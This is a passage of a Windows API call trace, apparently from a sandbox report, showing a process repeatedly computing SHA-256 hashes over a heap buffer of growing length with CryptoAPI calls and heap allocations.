	[0214.561] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.561] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734290
	[0214.561] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734290, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734290, pdwDataLen=0x128ba4) returned 1
	[0214.561] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.561] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.561] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.561] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.561] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0214.561] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.562] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27342b8
	[0214.562] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27342b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27342b8, pdwDataLen=0x128ba4) returned 1
	[0214.562] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.562] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.562] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.562] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.562] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0214.562] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.562] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27342e0
	[0214.562] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27342e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27342e0, pdwDataLen=0x128ba4) returned 1
	[0214.562] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.562] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.562] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2763c58) returned 1
	[0214.562] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2763c58
	[0214.562] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.563] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.563] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0214.563] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734308
	[0214.563] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734308, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734308, pdwDataLen=0x128ba4) returned 1
	[0214.563] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.563] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.563] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.593] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.594] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0214.594] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734330
	[0214.594] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734330, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734330, pdwDataLen=0x128ba4) returned 1
	[0214.594] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.594] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.594] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.594] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.594] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0214.594] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734358
	[0214.594] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734358, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734358, pdwDataLen=0x128ba4) returned 1
	[0214.594] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.594] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.594] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.595] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.595] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0214.595] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734380
	[0214.595] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734380, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734380, pdwDataLen=0x128ba4) returned 1
	[0214.595] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.595] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.595] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.595] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.595] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0214.595] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27343a8
	[0214.595] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27343a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27343a8, pdwDataLen=0x128ba4) returned 1
	[0214.595] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.595] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.595] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.596] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.596] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0214.596] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27343d0
	[0214.596] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27343d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27343d0, pdwDataLen=0x128ba4) returned 1
	[0214.596] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.596] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.596] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.596] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.596] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0214.596] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27343f8
	[0214.596] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27343f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27343f8, pdwDataLen=0x128ba4) returned 1
	[0214.596] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.597] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.597] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.597] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.597] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0214.597] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.597] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734420
	[0214.597] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734420, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734420, pdwDataLen=0x128ba4) returned 1
	[0214.597] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.597] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.597] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.597] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.597] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0214.598] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.598] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734448
	[0214.598] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734448, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734448, pdwDataLen=0x128ba4) returned 1
	[0214.598] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.598] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.598] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.598] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.598] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0214.598] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.598] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734470
	[0214.598] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734470, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734470, pdwDataLen=0x128ba4) returned 1
	[0214.598] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.598] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.598] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.599] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.599] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0214.599] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734498
	[0214.599] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734498, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734498, pdwDataLen=0x128ba4) returned 1
	[0214.599] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.599] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.599] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.599] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.599] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0214.599] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27344c0
	[0214.599] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27344c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27344c0, pdwDataLen=0x128ba4) returned 1
	[0214.599] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.599] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.599] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.600] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.600] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0214.600] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.600] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27344e8
	[0214.600] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27344e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27344e8, pdwDataLen=0x128ba4) returned 1
	[0214.600] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.600] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.600] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.600] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.600] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0214.600] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.600] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734510
	[0214.600] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734510, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734510, pdwDataLen=0x128ba4) returned 1
	[0214.600] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.600] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.600] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.601] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.601] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0214.601] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.601] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734538
	[0214.601] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734538, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734538, pdwDataLen=0x128ba4) returned 1
	[0214.601] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.601] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.601] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.601] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.601] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0214.601] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.601] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734560
	[0214.601] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734560, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734560, pdwDataLen=0x128ba4) returned 1
	[0214.601] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.601] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.601] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.602] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.602] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0214.602] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.602] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734588
	[0214.602] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734588, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734588, pdwDataLen=0x128ba4) returned 1
	[0214.602] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.602] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.602] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.602] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.602] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0214.602] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.602] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27345b0
	[0214.602] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27345b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27345b0, pdwDataLen=0x128ba4) returned 1
	[0214.602] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.602] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.603] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.603] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.603] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0214.603] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.603] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27345d8
	[0214.603] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27345d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27345d8, pdwDataLen=0x128ba4) returned 1
	[0214.603] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.603] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.603] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.603] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.603] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0214.603] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.604] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734600
	[0214.604] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734600, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734600, pdwDataLen=0x128ba4) returned 1
	[0214.604] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.604] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.604] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.604] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.604] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0214.604] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.604] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734628
	[0214.604] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734628, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734628, pdwDataLen=0x128ba4) returned 1
	[0214.604] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.604] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.604] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.605] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.605] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0214.605] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.605] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734650
	[0214.605] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734650, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734650, pdwDataLen=0x128ba4) returned 1
	[0214.605] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.605] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.605] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.605] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.605] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x2e0, dwFlags=0x0) returned 1
